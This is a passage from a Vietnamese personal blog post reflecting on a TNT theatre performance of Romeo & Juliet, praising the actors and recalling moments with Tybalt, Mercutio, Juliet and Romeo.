Cũng cần gởi lời khen tới các diễn viên của nhà hát TNT. Với số thành viên (xuất hiện trên sân khấu) rất ít, họ vẫn có thể tái hiện lại hầu như đúng nguyên tác. Ngôn ngữ của vở kịch trong cái nhìn của người hiện đại như anh đã nói ở trên là kiểu cách, sáo rỗng, nhưng diễn xuất rất thật. Hừm, kiểu như đấy là chính họ chứ không phải là đang vào vai nào đó trong một vở kịch.

Một tác phẩm nghệ thuật thành công, là phải đi vào lòng người đọc, và ở đó trong một thời gian dài. Anh nhắc lại câu này. Có thể vở kịch tối qua, sau này anh sẽ chỉ nhớ về nó như là vở kịch Romeo & Juliet đầu tiên mà anh được xem. Nhưng, chính vào cái thời khắc tối qua ấy, anh đã mơ hồ bắt được cái “hồn” của tác phẩm. Đó có thể là sự thù hận lên tới đỉnh điểm qua cách hành xử của Tybalt và Mercutio. Đó là vẻ rất thơ ngây và nhưng đầy nồng cháy của Juliet khi đứng trên lầu thổ lộ lời yêu. Đó cũng là hình ảnh nông nổi nhưng đầy nhiệt huyết của chàng Romeo trẻ tuổi.

Không cần dài lâu, chỉ cần một vài phút giây ấy thôi, là đủ…

B.l.u.e.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.